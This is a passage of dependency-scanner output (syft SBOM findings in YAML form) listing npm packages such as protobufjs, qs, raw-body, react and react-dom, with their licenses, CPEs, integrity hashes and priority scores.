licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/protobufjs@7.5.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz
|
|
integrity: sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg==
|
|
dependencies:
|
|
'@protobufjs/aspromise': ^1.1.2
|
|
'@protobufjs/base64': ^1.1.2
|
|
'@protobufjs/codegen': ^2.0.5
|
|
'@protobufjs/eventemitter': ^1.1.0
|
|
'@protobufjs/fetch': ^1.1.0
|
|
'@protobufjs/float': ^1.0.2
|
|
'@protobufjs/inquire': ^1.1.1
|
|
'@protobufjs/path': ^1.1.2
|
|
'@protobufjs/pool': ^1.1.0
|
|
'@protobufjs/utf8': ^1.1.1
|
|
'@types/node': '>=13.7.0'
|
|
long: ^5.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d4455e8054d4e780
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: proxy-addr 2.0.7'
|
|
title: proxy-addr 2.0.7
|
|
description: 'Package discovered: proxy-addr 2.0.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ce10aea6db36304a
|
|
name: proxy-addr
|
|
version: 2.0.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/proxy-addr@2.0.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz
|
|
integrity: sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==
|
|
dependencies:
|
|
forwarded: 0.2.0
|
|
ipaddr.js: 1.9.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4788b4003cbe678a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: proxy-from-env 2.1.0'
|
|
title: proxy-from-env 2.1.0
|
|
description: 'Package discovered: proxy-from-env 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d0670890e90b35a8
|
|
name: proxy-from-env
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/proxy-from-env@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz
|
|
integrity: sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6d2187ed4d7bb00d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: qrcode 1.5.4'
|
|
title: qrcode 1.5.4
|
|
description: 'Package discovered: qrcode 1.5.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9616afcfad81bbcd
|
|
name: qrcode
|
|
version: 1.5.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/qrcode@1.5.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz
|
|
integrity: sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg==
|
|
dependencies:
|
|
dijkstrajs: ^1.0.1
|
|
pngjs: ^5.0.0
|
|
yargs: ^15.3.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cd93e60074e9daeb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: qs 6.14.2'
|
|
title: qs 6.14.2
|
|
description: 'Package discovered: qs 6.14.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: baa7b01807110a4c
|
|
name: qs
|
|
version: 6.14.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/qs@6.14.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/qs/-/qs-6.14.2.tgz
|
|
integrity: sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q==
|
|
dependencies:
|
|
side-channel: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4d4da368c4cb9e85
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: qs 6.15.1'
|
|
title: qs 6.15.1
|
|
description: 'Package discovered: qs 6.15.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 994fc27bb4c175c9
|
|
name: qs
|
|
version: 6.15.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/qs@6.15.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/qs/-/qs-6.15.1.tgz
|
|
integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==
|
|
dependencies:
|
|
side-channel: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 53a30fbc709808bd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: queue 6.0.2'
|
|
title: queue 6.0.2
|
|
description: 'Package discovered: queue 6.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3d2cabf593c9f69a
|
|
name: queue
|
|
version: 6.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/queue@6.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/queue/-/queue-6.0.2.tgz
|
|
integrity: sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA==
|
|
dependencies:
|
|
inherits: ~2.0.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ef5b9014e52d743a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: queue-microtask 1.2.3'
|
|
title: queue-microtask 1.2.3
|
|
description: 'Package discovered: queue-microtask 1.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 254ae16d84fc4780
|
|
name: queue-microtask
|
|
version: 1.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/queue-microtask@1.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz
|
|
integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cbdbab233debac3e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: range-parser 1.2.1'
|
|
title: range-parser 1.2.1
|
|
description: 'Package discovered: range-parser 1.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4bcca27d3d8ccfdd
|
|
name: range-parser
|
|
version: 1.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/range-parser@1.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz
|
|
integrity: sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7d9cd0e4ae47337e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: raw-body 2.5.3'
|
|
title: raw-body 2.5.3
|
|
description: 'Package discovered: raw-body 2.5.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 62bf6c85ca605f5a
|
|
name: raw-body
|
|
version: 2.5.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/raw-body@2.5.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz
|
|
integrity: sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA==
|
|
dependencies:
|
|
bytes: ~3.1.2
|
|
http-errors: ~2.0.1
|
|
iconv-lite: ~0.4.24
|
|
unpipe: ~1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aa3b52d55574a475
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react 18.3.1'
|
|
title: react 18.3.1
|
|
description: 'Package discovered: react 18.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 405f6eb700866b5f
|
|
name: react
|
|
version: 18.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react@18.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react/-/react-18.3.1.tgz
|
|
integrity: sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==
|
|
dependencies:
|
|
loose-envify: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 36e9f0b5d3cd995c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react-dom 18.3.1'
|
|
title: react-dom 18.3.1
|
|
description: 'Package discovered: react-dom 18.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 98bcef2cdcc9941a
|
|
name: react-dom
|
|
version: 18.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react-dom@18.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz
|
|
integrity: sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==
|
|
dependencies:
|
|
loose-envify: ^1.1.0
|
|
scheduler: ^0.23.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 19cfc2419956329b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react-is 16.13.1'
|
|
title: react-is 16.13.1
|
|
description: 'Package discovered: react-is 16.13.1'
|
|
